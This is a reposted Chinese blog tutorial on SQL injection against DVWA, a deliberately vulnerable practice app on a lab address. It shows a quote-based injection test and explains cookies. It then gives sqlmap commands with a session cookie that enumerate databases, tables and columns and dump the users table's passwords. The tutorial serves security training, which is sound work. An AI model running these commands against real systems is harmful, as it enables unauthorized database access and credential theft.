当前位置:   article > 正文

对DVWA进行sql注入_dvwa中获得cookie的方法

dvwa中获得cookie的方法
1.判断是否有注入漏洞

打开DVWA,在SQL注入中输入1,返回正常。
在这里插入图片描述
输入1’,报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
说明此处存在注入漏洞

2.获取cookie信息

审查元素,选择network,里面发现Cookie信息。
Q:cookie是什么?

  1. 定义
    cookie是由服务器发送给客户端(浏览器)的小量信息

  2. 作用
    cookie是键值对形式存储的少量信息,那它有什么作用呢?
    我们知道,平时上网时都是使用无状态的HTTP协议传输出数据,这意味着客户端与服务端在数据传送完成后就会中断连接。这时我们就需要一个一直保持会话连接的机制。在session出现前,cookie就完全充当了这种角色。也就是,cookie的小量信息能帮助我们跟踪会话。一般该信息记录用户身份。
    Cookie可以保持登录信息到用户下次与服务器的会话,换句话说,下次访问同一网站时,用户会发现不必输入用户名和密码就已经登录了。

当使用sqlmap注入时带上cookie,将会获得更多信息。

在这里插入图片描述

3.sqlmap尝试注入

sqlmap -u + URL + cookie

sqlmap -u “http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=q8tdqvlpdagbbldrvh7bgvvb00”

在这里插入图片描述
得到数据库类型版本(MySQL),服务器类型版本(Apache,PHP)

4.使用–dbs获取其所有的数据库

sqlmap -u “http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=q8tdqvlpdagbbldrvh7bgvvb00” -dbs
在这里插入图片描述

5.使用-D xxx指定查看的数据库,用–tables查看该数据库的所有表

sqlmap -u “http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=q8tdqvlpdagbbldrvh7bgvvb00” --dbs -D dvwa --tables

在这里插入图片描述

6.使用-D xxx -T ttt指定查看的表,用–columns查看表的列

sqlmap -u “http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=q8tdqvlpdagbbldrvh7bgvvb00” --dbs -D dvwa -T users --columns
在这里插入图片描述

7.获取密码

sqlmap -u “http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=q8tdqvlpdagbbldrvh7bgvvb00” --dbs -D dvwa -T users -C user,password,user_id --dump

-D dvwa数据库
-T users表
-C user,password,user_id 查看这三列的值
-dump 输出CSV文件并存放到某个路径中

在这里插入图片描述
完成

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/150131
推荐阅读
相关标签
  

闽ICP备14008679号